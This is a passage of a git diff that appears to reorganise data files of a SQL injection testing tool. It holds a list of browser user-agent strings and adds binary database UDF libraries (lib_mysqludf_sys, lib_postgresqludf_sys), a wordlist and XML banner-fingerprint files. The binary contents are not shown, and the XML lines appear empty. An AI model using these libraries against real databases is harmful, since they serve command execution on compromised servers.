(KHTML, like Gecko) Version/18.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15 Ddg/18.6 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 15_4 ADSSO) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 Unique/97.7.7239.70 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-1) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-2) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 YaBrowser/25.6.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.104 ADG/11.1.4905 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.96 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Avast/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 AVG/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 Herring/90.1.1459.6 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Norton/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 OpenWave/96.4.8983.84 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.5 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.16 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4482.0 Safari/537.36 Edg/92.0.874.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0 +Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 +Mozilla/5.0 (X11; CrOS x86_64 13904.97.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.167 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/116.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/28.0 Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 +Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 +Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 +Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 +Mozilla/5.0 (X11; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 diff --git a/data/txt/wordlist.tx_ b/data/txt/wordlist.tx_ new file mode 100644 index 00000000000..f2b52c90658 Binary files /dev/null and b/data/txt/wordlist.tx_ differ diff --git a/udf/README.txt b/data/udf/README.txt similarity index 100% rename from udf/README.txt rename to data/udf/README.txt diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ new file mode 100644 index 00000000000..c5339680c1b Binary files /dev/null and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ new file mode 100644 index 00000000000..aed988c71eb Binary files /dev/null and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ new file mode 100644 index 00000000000..8c09c2a49ba Binary files /dev/null and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ new file mode 100644 index 00000000000..1e29a745889 Binary files /dev/null and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..2227f89936f Binary files /dev/null and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..7ece1b633c9 Binary files /dev/null and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..6816064fa49 Binary files /dev/null and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..0e79dbb195a Binary files /dev/null and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..bb2aaf8ba91 Binary files /dev/null and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..506b0eb3567 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..ef49da86edc Binary files /dev/null and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..a1ca1cc710b Binary files /dev/null and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..0d2f0bc0a53 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..147d8db3b19 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..09662d8a928 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..42a0c7fd61f Binary files /dev/null and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..2db1ade11d5 Binary files /dev/null and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..1609227d01a Binary files /dev/null and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..36db3b0eff7 Binary files /dev/null and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..7e8760c7e36 Binary files /dev/null and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..044e0976c44 Binary files /dev/null and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..d3866e04c93 Binary files /dev/null and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..4c957014480 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..dd637decae2 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..d92cbd30edc Binary files /dev/null and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..38562790479 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..b72a328525b Binary files /dev/null and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..214272877c7 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..b7221fd873a Binary files /dev/null and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..d7e0c8a46a5 Binary files /dev/null and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..e8b109791c2 Binary files /dev/null and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..2748ae32c81 Binary files /dev/null and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..60c9971218f Binary files /dev/null and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ diff --git a/data/xml/banner/generic.xml b/data/xml/banner/generic.xml new file mode 100644 index 00000000000..6bd38d6b4c7 --- /dev/null +++ b/data/xml/banner/generic.xml @@ -0,0 +1,216 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/mssql.xml b/data/xml/banner/mssql.xml similarity index 100% rename from xml/banner/mssql.xml rename to data/xml/banner/mssql.xml diff --git a/data/xml/banner/mysql.xml b/data/xml/banner/mysql.xml new file mode 100644 index 00000000000..456c9510b82 --- /dev/null +++ b/data/xml/banner/mysql.xml @@ -0,0 +1,79 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/oracle.xml b/data/xml/banner/oracle.xml similarity index 100% rename from xml/banner/oracle.xml rename to data/xml/banner/oracle.xml diff --git a/data/xml/banner/postgresql.xml b/data/xml/banner/postgresql.xml new file mode 100644 index 00000000000..7f03e8e8c4a --- /dev/null +++ b/data/xml/banner/postgresql.xml @@ -0,0 +1,16 @@ + + + + + + + + + + + + + + + + diff --git a/xml/banner/server.xml b/data/xml/banner/server.xml similarity index 67% rename from xml/banner/server.xml rename to data/xml/banner/server.xml index cd64d8b8ab1..4d99cade0bd 100644 --- a/xml/banner/server.xml +++ b/data/xml/banner/server.xml @@ -2,28 +2,35 @@ + + + + + + + + - + - + - + - + @@ -67,19 +74,31 @@ - + - + - + - + + + + + + + + + + + + + @@ -120,24 +139,36 @@ - - + + - - + + - - + + - - + + - - + + + + + + + + + + + + + + @@ -230,98 +261,199 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -430,10 +562,6 @@ - - - - @@ -504,6 +632,14 @@ + + + + + + + + @@ -611,6 +747,34 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -670,12 +834,110 @@ - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/servlet.xml b/data/xml/banner/servlet-engine.xml similarity index 64% rename from xml/banner/servlet.xml rename to data/xml/banner/servlet-engine.xml index 75106859d74..c34d9617e1b 100644 --- a/xml/banner/servlet.xml +++ b/data/xml/banner/servlet-engine.xml @@ -3,10 +3,18 @@ - + + + + + + + + + diff --git a/data/xml/banner/set-cookie.xml b/data/xml/banner/set-cookie.xml new file mode 100644 index 00000000000..6f7bed59c02 --- /dev/null +++ b/data/xml/banner/set-cookie.xml @@ -0,0 +1,93 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/sharepoint.xml b/data/xml/banner/sharepoint.xml similarity index 100% rename from xml/banner/sharepoint.xml rename to data/xml/banner/sharepoint.xml diff --git a/xml/banner/x-aspnet-version.xml b/data/xml/banner/x-aspnet-version.xml similarity index 100% rename from xml/banner/x-aspnet-version.xml rename to data/xml/banner/x-aspnet-version.xml diff --git 